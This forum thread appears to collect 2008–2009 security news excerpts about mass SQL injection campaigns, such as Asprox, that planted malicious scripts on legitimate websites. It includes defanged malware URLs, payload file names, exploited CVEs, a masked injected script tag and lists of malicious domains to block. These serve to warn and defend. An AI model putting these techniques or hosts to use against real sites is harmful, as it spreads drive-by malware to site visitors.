2008-05-19, 13:40

Mass SQL Injection Attack Targets Chinese Web Sites
- http://preview.tinyurl.com/5tmj3q
May 19, 2008 3:00 AM PDT (PC World) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan. First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP (Internet Protocol) addresses, said Wayne Huang, chief executive officer of Armorize Technologies, in Taipei. "The attack is ongoing,... even if they can't successfully insert malware, they're killing lots of Web sites right now, because they're just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim websites," Huang said... Technical details of the malware, including the specific browser vulnerabilities exploited, were not immediately available..."


2008-05-19, 19:37
More on the China/Taiwan SQL attacks...

- http://preview.tinyurl.com/56u2m7
May 19, 2008 (Computerworld) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites... The attackers in the more recent outbreak aren't targeting a specific vulnerability. Instead, they are using an automated SQL injection attack engine that is tailored to attack Web sites using SQL Server, Huang said. The attack uses SQL injection to infect targeted Web sites with malware, which in turn exploits vulnerabilities in the browsers of those who visit the Web sites, he said, calling the attack "very well designed." The malware injected by the attack comes from 1,000 different servers and targets 10 vulnerabilities in Internet Explorer and related plug-ins that are popular in Asia, Huang said.

The vulnerabilities are MS06-014 (CVE-2006-0003), MS07-017 (CVE-2007-1765), RealPlayer IERPCtl.IERPCtl.1 (CVE-2007-5601), GLCHAT.GLChatCtrl.1 (CVE-2007-5722), MPS.StormPlayer.1 (CVE-2007-4816), QvodInsert.QvodCtrl.1, DPClient.Vod (CVE-2007-6144), BaiduBar.Tool.1 (CVE-2007-4105), VML Exploit (CVE-2006-4868) and PPStream (CVE-2007-4748)."
- http://nvd.nist.gov/nvd.cfm

- http://blog.trendmicro.com/chinese-weekend-compromise/
May 19, 2008


2008-05-19, 23:28

- http://www.computerworld.com/comments/node/9086658#comment-92914
[China and Taiwan - SQL injection attacks]
Submitted by Anonymous tech on May 19, 2008 - 16:11.
" 'Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites...'

That appears to be incorrect - the SQL injection plants a java-scripted IFRAME which re-directs the victim's browser to an attacker's site that performs the exploits. Please check the facts. More than one source would confirm it.

Every other SQL injection attack to date has done that, using an Mpack-like exploit tool at the attackers' site - NOT the site that was the victim of the SQL injection."


2008-05-20, 11:09
FYI... (apologies for the long post - needed for detail):

- http://blog.trendmicro.com/yet-more-weekend-compromises-reach-other-shores/
May 19, 2008 - "...This discovery comes on the tail of the mass compromise* of APAC sites (China, Taiwan, Hong Kong, and Singapore). Curious is how some of the malicious URLs in this new set of compromises are the same as in the first mass compromise. The four sites — humanitarian, government, and news — were injected with the malicious JavaScript..."

Chinese Weekend Compromise
* http://blog.trendmicro.com/chinese-weekend-compromise/
May 19, 2008 - "Just a week after half a million Web sites were compromised, here comes another mass Web threat... This time, Senior Threat Analyst Aries Hsieh, together with our research team in Taiwan, picked up on another script injection attack aimed at Web sites in the Chinese language... A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site hxxp ://{BLOCKED} .us /s.js

JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:
1. Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
2. Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
3. Checks for GLAVATAR.GLAvatarCtrl.1
4. Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
5. Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically to China, Taiwan, Singapore, and Hong Kong. These vulnerabilities trigger JS_IFRAME.AD to redirect users to one of the following URLs:
* hxxp ://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
* hxxp ://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
* hxxp ://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
* hxxp ://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
* hxxp ://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
These four malware, in turn, download and execute
hxxp ://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag..."

(Screenshots available at both TrendMicro URLs above.)


2008-05-21, 04:07
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

- http://isc.sans.org/diary.html?storyid=4439
Last Updated: 2008-05-20 16:55:25 UTC ...(Version: 3) - "...Shadowserver has published a list of domains used in past -and- recent massive SQL injections* that insert malicious javascript into websites. The list is just focused on mass SQL injection attacks... plans to maintain this list as we come across new domains over time. The list also contains an estimated number of current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource..."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Full list of Injected Sites ...last modified date/time at bottom of page


2008-06-02, 13:27

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Page last modified on June 01, 2008, at 09:04 PM
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google)...
Some of these have been re-injected by URL encoding the script names. So if a host/domain shows up in parentheses and also in the list unencoded, these were two separate injection runs..."

("Full list..." at the URL above.)


2008-06-03, 04:27

New sql injection site with fastflux hosting
- http://isc.sans.org/diary.html?storyid=4519
Last Updated: 2008-06-02 22:13:22 UTC - "One of our frequent contributors notified us of a new sql injection site.
hxxp ://en-us18 .com /b.js is being injected via sql into websites.
When I googled for it I saw 560 injected webpages. “b.js injects an iFrame which points to
hxxp ://en-us18 .com/cgi-bin/index.cgi?ad which in turn embeds two Flash files:

advert.swf: http://www.virustotal.com/analisis/d6ffe290e9938d3e646f82c536abd0c7
banner.swf: http://www.virustotal.com/analisis/83be3d4d30eb60d92272625634a3babc

This appears to be fast fluxed or at least setup to change rapidly based on this dig output... A second dig a few minutes later produced similar but slightly different results. So this domain is changing. I guess they got tired of people blackholing their ip address. So in that case I would recommend you dns blackhole that domain."


2008-06-06, 13:51
And the list just keeps on growing...

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Page last modified on June 05, 2008, at 07:10 AM
Page last modified on June 06, 2008, at 06:22 AM


2008-06-18, 13:38

- http://preview.tinyurl.com/64qke6
June 17, 2008 (trustedsource.org/blog) - "MTV France has become another victim of the “Latest Wave of SQL Injection Attacks“. The web site and the RSS feed are heavily infected with several malicious scripts as seen in the screenshot... Each of the malicious domains are serving a script called ‘b.js’ which is related to the “Danmec” malware family (a.k.a. “Asprox”). These domains are hosted on a “fast-flux” network of compromised computers which could also relay spam messages... The biggest concern with the infected RSS feed is that every RSS reader or web site, including the content from MTV France, will host the malicious scripts on their web sites. In a quick test with a WordPress 2.1.3 installation, the full content (including the script) was included in the blog and not filtered out. This is one example of the threat posed by Web 2.0 content mash-ups, where someone is including generated content via feeds into his web site and thereby just spreading the malicious code further."

(Screenshots available at the URL above.)


2008-06-25, 14:02

Microsoft SQL Injection Prevention Strategy
- http://forums.spybot.info/showpost.php?p=205963&postcount=94

Full list of Injected Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
...last modified on June 25, 2008, at 05:17 AM


2008-06-27, 01:52

- http://www.theregister.co.uk/2008/06/26/microsoft_hp_sql_injection_tools/
26 June 2008 - "...ScanSafe, a company that monitors websites for malicious behavior, reports* a new wave of SQL-injection attacks that harnesses infected PCs to search out and attack vulnerable websites. Sites that are compromised, in turn, install backdoors on visitors' machines, creating a worm-like characteristic. The so-called Asprox attacks are distinct from a recent swarm of SQL attacks that over the past few months... The entry of Asprox suggests other malware gangs may be adopting the technique after seeing the success of their competitors..."
* http://preview.tinyurl.com/5cyo99
June 26, 2008 (ScanSafe STAT blog) - "The Asprox botnet began pumping out a fresh round of SQL injection attacks yesterday... The Asprox botnet causes infected computers (bots) to become the attack mechanism. Some of the bots are instructed to upload the SQL injection attack tool, which then queries search engines to find susceptible sites and attempts to exploit any found. Successful exploit results in compromised websites that silently attempt to infect visitors' computers. Other bots are used as hosts for the malware; these hosts appear to be using the Neosploit framework. Asprox uses fast flux, thus a single malware domain called by the compromised site may resolve to one of a number of IP addresses (i.e. one domain name may resolve to any one of a number of attacker-controlled victim computers commandeered to act as malware hosts)... a large number of the trafficked compromised sites appear to be from the manufacturing sector, particularly among companies involved in the manufacture or distribution of heating and cooling systems... the malware dropped in the June SQL injection attacks has shifted to backdoors and proxy Trojans - infections which add to the overall size of the Asprox botnet. The June attacks also appear to have some roots in the Ukraine and Malaysia, rather than China..."


2008-07-01, 12:53

More SQL Injection with Fast Flux hosting
- http://isc.sans.org/diary.html?storyid=4645
Last Updated: 2008-07-01 04:46:52 UTC ...(Version: 5) - "...More fast flux domains redirecting to other domains which then redirect to the malware site. What's interesting about this one is it doesn't look like they are using exploits to install the malware, they are redirecting to a fake AV site which fools users into installing the malware. Some of the domains hosting the injected js are as follows:
hxxp :// updatead .com
hxxp :// upgradead .com
hxxp :// clsiduser.com
hxxp :// dbdomaine.com
b.js then redirects to several domains which host a cgi script
hxxp :// kadport .com /cgi-bin/indes.cgi?ad
hxxp :// hdadwcd .com /cgi-bin/index.cgi?ad
Which then redirects to ad.js which redirects the user to
hxxp :// spyware-quick-scan .com?wmid=1041&I=14&it=1&s=4t
This site attempts to trick the user into installing installer.exe
AV coverage is decent:
...This post has a nice running list of domains: http://infosec20.blogspot.com/2008/06/asprox-sql-injection-botnet-and-iframe.html
The cause seems to be the ASPROX bot kit, which got some SQL injection capabilities in mid-May, see http://www.heise-online.co.uk/security/Asprox-botnet-now-equipped-with-SQL-injection-tool--/news/110742 .
Dr. Ulrich's post http://isc.sans.org/diary.html?storyid=4565 lays out very nicely how it all happens... The folks at ShadowServer are keeping a comprehensive and updated list at:
Page last modified on July 01, 2008, at 10:16 AM ..."


2008-07-03, 18:18

Sony PlayStation website hacked
- http://www.theregister.co.uk/2008/07/03/playstation_hack/
3 July 2008 - "Gamers visiting the US Sony PlayStation website risk malware infection after the site was hit by hackers. SQL injection vulnerabilities on the site were used by miscreants to load malicious code on pages showcasing the PlayStation games SingStar Pop and God of War, net security firm Sophos reports*. The code promotes scareware to visitors, which falsely claims that their computers are infected with computer viruses to frighten them into purchasing software of little or no security utility... Sophos informed Sony of the website vulnerabilities, which were purged by Thursday morning. The attack is the latest in a wave of SQL injection attacks that have turned the websites of legitimate organisations into conduits for drive-by download assaults. Recent victims have included the website of tennis regulators ITF and ATP, the professional players tour and Wal-Mart. Large-scale SQL Injection attacks starting around October 2007 have hit a large number of small sites as well as high-profile targets..."
* http://www.sophos.com/security/blog/2008/07/1540.html


2008-07-04, 14:56
Update... 7.4.2008

- http://atlas.arbor.net/summary/fastflux
"...Currently monitoring -6508- fastflux domains..."


2008-07-07, 14:02

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080705
5 July 2008 - "...People are saying they were compromised by SQL Injection, but when I dig a little deeper I find that what actually happened was some user went to somegoodsite.com and ended up compromised. If you're one of those people, this blog's for you...
Understanding the Danmec/Asprox Attacks...
Basically, the attacker launches an SQL injection attack against somegoodsite.com. SQL injection attacks try to exploit trust relationships between web applications and the databases that support them in order to add, remove or modify data in databases in ways it was never intended. In the case of the Danmec/Asprox attacks, the intent of the SQL injection is to add a single line of HTML code to the database so that somegoodsite.com will present it to every user who visits the site.
The initial code has been an HTML "script" command, which is used to define a segment of code for your browser to run. The difference in the Asprox/Danmec attacks though, is that the code segment to run is malicious javascript hosted at evilsite.net. This is called a drive-by download.
Innocent user wasn't targeted directly by the attacker's SQL injection. Instead, innocent user was harmlessly surfing the web during his 1 hour lunch break and got something more than he bargained for from somegoodsite.com. Evilsite.net then looks at the information presented by innocent user's system and determines that evilsite2.net is hosting an exploit that should be effective. Evilsite.net then issues an IFRAME redirect command telling innocent user's browser to contact evilsite2.net (all without any interaction from innocent user). Finally, evilsite2.net provides a working exploit which compromises innocent user's machine. These compromises can be in the form of keyloggers, botnets, backdoors, or any other nasiness an attacker can drum up. Since this exploit is reliant on innocent user's web client downloading and executing the malicious code on its own, we call this a client-side attack.
So the moral of the story is that somegoodsite.com got compromised by SQL injection. Your users got compromised by redirects, drive-by-downloads and client-side attacks."

(Graphic available at the Shadowserver URL above.)


2008-07-17, 12:00

Governmental, Healthcare, and Top Business Websites have fallen victims to the new round of Asprox mass attack
- http://www.finjan.com/MCRCblog.aspx?EntryId=2002
Jul 16, 2008 - "... The attack toolkits is designed to first search Google for webpages with the file extension [.asp] and then launch SQL injection attacks to append a reference to the malware file using the SCRIPT tag. During the first two weeks of July 2008, Finjan... detected over 1,000 unique Website domains that were compromised by this attack. Each of the compromised domains included a reference to a malware that was served by over 160 different domains across the Internet. Since the list of these malware serving domains increases every day, we believe this is just the tip of the iceberg for the scope and impact of this attack. Among the compromised websites we found were those of respectable organizations, governmental institutes, healthcare organizations as well as high-ranked websites... Each of the 160 different domains hosting [b.js] and [ngg.js] [fgg.js] points to the location of the malicious file which was unique to each and every one of them.
The pointed iframe loads an obfuscated JavaScript code which then downloads and executes the malware on the victim machine automatically. The exploit provided by writers of the new version of NeoSploit toolkit, which uses a refreshing code for the obfuscation (using the location of the page as part of the obfuscation function)... The malicious code of the above script exploits several vulnerabilities on the victim’s machine in order to heighten the chances for successful exploitation:
* MDAC Vulnerability
* QuickTime rtsp Vulnerability
* AOL SuperBuddy ActiveX Control Code Execution Vulnerability
Upon successful exploitation, a Trojan is downloaded and executed on the victim’s machine..."

(Screenshots available at the URL above.)

Also see:
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080705


2008-07-21, 18:08

SQL Injection List - Format Update
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 can be fetched in text form at http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."


2008-07-24, 13:07

- http://isc.sans.org/diary.html?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."


2008-08-08, 15:40

SQL Injection Attacks Targeting Chinese-oriented Sites
- http://www.f-secure.com/weblog/archives/00001482.html
August 8, 2008 - "...in conjunction with the Beijing 2008 Olympics Games, and with ‘China’ being one of the more popular search engine keywords at the moment, it makes sense for malware writers to focus their attention on the Chinese web – and we’ve been seeing some interesting examples of SQL injection attacks specifically targeting website designed for a Chinese audience, whether from the mainland or overseas. Like most SQL injection attacks, these attacks begin with a compromising script being injected into a legitimate site, compromising it and redirecting its users to a malicious website. This website then takes advantage of the vulnerabilities available on the user’s computer to download and execute malicious programs... a specially crafted Flash file exploiting Adobe Flash Player Integer overflow (CVE-2007-0071) is also served. When the webpage is loaded, it forcefully floods the user’s computer memory beyond its capacity, then takes advantage of the computer’s attempts to correct the problem to execute its own hidden code. If the user hasn’t updated their Flash Player* to newer versions than those targeted, their computer is vulnerable..."

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version


2008-08-08, 18:58

More SQL Injections ...active NOW
- http://isc.sans.org/diary.html?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These file contains some java script... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT (Virustotal) detect the file as malicious and for FF 10/36 detect the file as being malicious.
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
Attempts get the browser to include the rondll32.exe file. Detection for rondll32.exe is good with most AV products catching this one.
was unavailable at the time I checked.

These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."


2008-08-23, 03:12

Sunkist site - mass JavaScript injection
- http://securitylabs.websense.com/content/Alerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)


2008-08-29, 14:17

- http://www.darkreading.com/document.asp?doc_id=162515&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe.com/__data/assets/pdf_file/8696/July_2008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."


2008-09-16, 15:07

SQL injection ...BusinessWeek.com
- http://www.sophos.com/pressoffice/news/articles/2008/09/businessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek’s website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)


2008-09-18, 11:54

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally or remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-091215-0809-99

(Screenshots and more detail available at both URL links above.)


2008-09-29, 14:13

ASPROX mutant
- http://isc.sans.org/diary.html?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/diary.html?storyid=4565

** http://www.virustotal.com/en/analisis/5584aa5aed6d2338141d7ae62c126fff


2008-10-14, 20:08

China Business Network Rail Site Infected with Mass Script Injection
- http://securitylabs.websense.com/content/Alerts/3207.aspx
10.14.2008 - "Websense... discovered today that the China Business Network Rail Web site has been infected with the mass attack JavaScript injection to deliver a malicious payload. The reporting page on the site contains partially obfuscated malicious JavaScript code that, through numerous redirects, loads numerous exploit code. Applications targetted include a GLWorld ActiveX Control, Real Player, a UUSE P2P streaming application, and Xulnei Thunder DapPlayer... Websense ThreatSeeker has been tracking how such attacks prevail over reputed Business-to-Business (B2B) and Business-to-Clients (B2C) Web sites to target their peers and other visitors..."

(Screenshots available at the URL above.)


2008-10-17, 17:36

Adobe site - SQL injected...
- http://www.sophos.com/security/blog/2008/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact the it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregister.co.uk/2008/10/16/hijacked_abobe_page/

(Screenshot available at both URLs above.)


2008-11-05, 01:27

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs.websense.com/content/Alerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)


2008-11-08, 22:46

- http://www.viruslist.com/en/weblog?weblogid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to Java Script located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."


2008-11-25, 17:57

"Warning: We strongly suggest that readers NOT visit websites on this list. They all have a history of covert hacks, redirecting the browser to drive-by-malware installations, and should be considered dangerous and capable of infecting and causing damage to your system with exploits, spyware, trojans, viruses, and the like. "

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 11/24/08 13:44:37 -0400

Significant additions:
Domain (442 domains)
go .nnd .hk ................ -Count- 92,400 -Date Found- 11/04/08
www .wakasa .or .jp ... -Count- 87,700 -Date Found- 11/12/08


2008-12-01, 19:45

- http://www.infoworld.com/article/08/12/01/CBS_website_bitten_by_iFrame_hack_1.html
December 01, 2008 - "TV network CBS has become the latest big name to have it website used to host malware, a security company has reported. It appears that Russian malware distributors were able to launch another iFrame attack on a sub-domain of the cbs.com site so that it was serving remote malware to any visitors. A user's vulnerability to the malware attack launched by the site hack would depend on a number of factors, including the type of security used on a PC, the operating system, and possibly the browser version... Finjan had informed CBS of the issue, but that the Russian exploit server had in any case been taken offline, neutering the attack for the time being..."


2008-12-24, 11:58

Mass Injection on John Sands Greeting Card Company site
- http://securitylabs.websense.com/content/Alerts/3268.aspx
12.23.2008 - "Websense... has discovered that the Web site of John Sands Greeting Card Company is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site has been found to contain the said malicious code... Acquired by American Greetings in 1996, the company was founded in 1837 by John Sands, the son of an English engraver. The company is Australia's second oldest registered company. In an effort to protect their visitors, Websense Security Labs has contacted John Sands Greeting Card Company and advised them on this incident..."

(Screenshot available at the Websense URL above.)


2008-12-31, 20:45

Multiple Chinese sites compromised...
- http://securitylabs.websense.com/content/alerts.aspx
12.31.2008 - Chinese Government Affairs Information Site Compromised...
12.29.2008 - Download Site of China.com Compromised - Malicious Web Site / Malicious Code
12.26.2008 - Sohu Web Site in China Compromised - Malicious Web Site / Malicious Code...


2009-01-13, 17:18

Paris Hilton website infected with malware
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=212800229
January 12, 2009 - "Once again, hackers have targeted technology associated with Paris Hilton. This time it's her Web site, ParisHilton .com. Security researchers at ScanSafe report that anyone visiting Hilton's site risks infection with malware. "Hilton's popular website, ParisHilton .com, has been outfitted with malware prompting site visitors to 'update' their system in order to continue navigating the site" ScanSafe said in an e-mail. "When the bogus pop-up box appears, users have the option to click 'Cancel' or 'OK.' Regardless of which option they choose, destructive malware will be downloaded to the user's computer"... ScanSafe says the malware has been detected on some 15,000 other Web sites. The company says it found a similar threat, a malicious ad, on Major League Baseball's MLB.com last week. Paris Hilton's site is currently compromised," said Mary Landesman, senior security researcher at ScanSafe, in a phone interview. "We first encountered it on [Jan. 9]. We don't know when it happened." According to Landesman, there's an iFrame that has been embedded in the ParisHilton .com Web site. The iFrame calls out to a site hosting the malware, you69tube .com. It downloads a malicious PDF and attempts to force users into clicking and launching the PDF, which attempts to activate an exploit. Because the malware tries to download additional files whether one clicks "Cancel" or "OK," Landesman says that only a hard quit - CTRL+ALT+Delete - of one's browser provides a way out..."

- http://www.f-secure.com/weblog/archives/00001581.html
January 15, 2009 - "... The offending IFrame appears to have been removed at this time... The infection of "Paris Hilton" highlights a popular trend among online attackers..."


2009-01-27, 12:25

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 01/23/09 09:12:21 -0700


2009-01-30, 16:08
FYI... (It appears the hacks have been busy - CYA)

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 01/29/09 14:02:09 -0700


2009-02-03, 19:06

- http://www-935.ibm.com/services/us/index.wss/summary/imc/a1030961?cntxt=a1030786
02 Feb 2009 - "... Web sites have become the Achilles' heel for corporate IT security. Attackers are intensely focused on attacking Web applications so they can infect end-user machines. Meanwhile, corporations are using off-the-shelf applications that are riddled with vulnerabilities; or even worse, custom applications that can host numerous unknown vulnerabilities that can't be patched. Last year more than half of all vulnerabilities disclosed were related to Web applications, and of these, more than 74 percent had no patch. Thus, the large-scale, automated SQL injection vulnerabilities that emerged in early 2008 have continued unabated. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen this summer...
Although attackers continue to focus on the browser and ActiveX controls as a way to compromise end-user machines, they are turning their focus to incorporate new types of exploits that link to malicious movies (for example, Flash) and documents (for example, PDFs). In the fourth quarter of 2008 alone, IBM X-Force traced more than a 50 percent increase in the number of malicious URLs hosting exploits than were found in all of 2007. Even spammers are turning to known Web sites for expanded reach. The technique of hosting spam messages on popular blogs and news-related websites more than doubled in the second half of this year..."


2009-02-08, 19:08

Kaspersky USA site hacked...
- http://www.theregister.co.uk/2009/02/08/kaspersky_compromise_report/
8 February 2009 - "A security lapse at Kaspersky has exposed a wealth of proprietary information about the anti-virus provider's products and customers, according to a blogger*, who posted screen shots and other details that appeared to substantiate the claims. In a posting made Saturday, the hacker claimed a simple SQL injection gave access to a database containing "users, activation codes, lists of bugs, admins, shop, etc." Kaspersky has declined to comment... The Register will be updating this story as warranted..."
* http://hackersblog.org/2009/02/07/usakasperskycom-hacked-full-database-acces-sql-injection/


2009-02-27, 17:57

